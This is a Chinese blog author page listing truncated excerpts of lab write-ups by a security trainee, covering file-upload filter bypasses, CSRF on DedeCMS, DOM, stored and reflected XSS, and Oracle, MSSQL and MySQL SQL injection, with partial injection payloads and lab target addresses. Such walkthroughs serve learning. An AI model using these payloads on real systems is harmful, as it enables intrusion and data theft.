Track 实习学员

leech223

0关注
1粉丝
30文章
返回网站首页

您已发布 30篇文章作品写文章

心司+文件上传漏洞+Pass-03

Pass-031/ 上传p2.php 文件,得到  2/ 根据提示,不允许上传.asp,.aspx,.php,.jsp后缀文件!由于php脚本解析,除了.php,还有.phtml,.php3,.php4所以改成p2.phtml 3/ 点击上传,上传成功  4/ 复制图像地址,打开浏览器

 2019-2-27
 0 
 11 

心司+文件上传漏洞+Pass-02

Pass-02思路一:按照Pass-01的方法,也可以上传成功(Content-type类型判断机制)思路二:图片马绕过1/不知道有什么限制,先上传php文件(使用php脚本编写) 点击上传,回显 2/既然回显“文件类型不正确”,那么我们上传图片格式,使用以下方式制作图片马以记事本打开图片,留下前三行,把php代码复制到三行以下,如图:  3/上传,抓包,改

 2019-2-27
 0 
 16 

心司+文件上传漏洞+Pass-01

打开BurpSuite,点击 intercept off ,进行截获数据包  设置 BurpSuite的代理ip发送的地址  接着浏览器设置与BurpSuite一致的代理地址  这样设置后,就可以进行抓包处理了。 Pass-01开启 BurpSuite 抓包在不知道任何提示的情况下,通过分析 该网站是用php脚本编写的网站1/

 2019-2-27
 0 
 19 

心司+9.4、CSRF跨站伪造请求

9.4、CSRF跨站伪造请求打开靶场,点击链接根据网站显示  该网站是Dedecms,版本如下  DedeCMS_V57_UTF8_SP1 百度查询 其CMS版本有没有通杀的漏洞 打开此链接https://xz.aliyun.com/t/2237 可以得知会在/data目录下生成一个modifytmp.inc文件,并且这个inc文件的内容

 2019-2-25
 1 
 54 

心司+DOM XSS靶场

9.3、DOM XSS靶场 开放dom.php源码打开http://120.203.13.75:6815/3/dom.txt  通过审计代码,发现SafeFilter() 的实参不是一个数组不是一个数组,意味着 SafeFilter()会被跳过,最终都会在主目录创建log.html 文件内容<iframe src="'.$aa.'&qu

 2019-2-23
 0 
 36 

心司+存储型Xss靶场

9.2、存储型Xss靶场链接 http://117.41.229.122:8082/云悉指纹查到是CMSFineCMS  百度FineCMS xss漏洞查看该链接https://www.jianshu.com/p/200ea62486d9 通过该文章所述、测试是存在两个存储型XSS漏洞 测试第一个漏洞http://117.41.229.122:8082/in

 2019-2-23
 0 
 43 

心司+9.1、反射型XSS靶场

9.1、反射型XSS靶场打开网站输入框上输入123456在浏览器窗口,点击F12在Element栏目上Ctrl+F输入写入的‘123456’查询到有两个地方存在‘123456’分析所得<input name="keyword" value="123456">input可以加入oninput事件函数首先需value值为空<input name

 2019-2-18
 0 
 14 

心司+5.4.1、Oracle注入- 报错注入

打开靶场id=1' --正常回显id=1' order by 1--正常回显id=1' order by 4--错误回显字段数为3id=1' union all select null,null,null from dual--正常回显,注入成功测试每个字段的的类型,发现无法正常回显,此方法行不通and 1=ctxsys.drithsx.sn(1,(select t

 2019-2-16
 0 
 25 

心司+MSSQL注入 — 反弹注入

自建mssql环境,以下参数:服务器:SQL5006.webweb.com数据库名:DB_14A89D3_dedecms密码:123456789账号:DB_14A89D3_dedecms_admin?id=2%27%20and%201=2%20union%20all%20select%20id,name,null%20from%20dbo.sysobjects%20where%20xtype=%2

 2019-2-15
 0 
 52 

心司+DNS注入

5.2.1、MYSQL 注入 - 全方位利用?id=1'错误回显?id=1%20and%201=1正确回显说明存在注入猜解字段数?id=1%20order%20by%201正确回显?id=1%20order%20by%202正确回显?id=1%20order%20by%203错误回显说明字段数位2找到输出点?id=1 and 1=2 union select 1,2输出点为2数据库名称?i

 2019-2-15
 0 
 35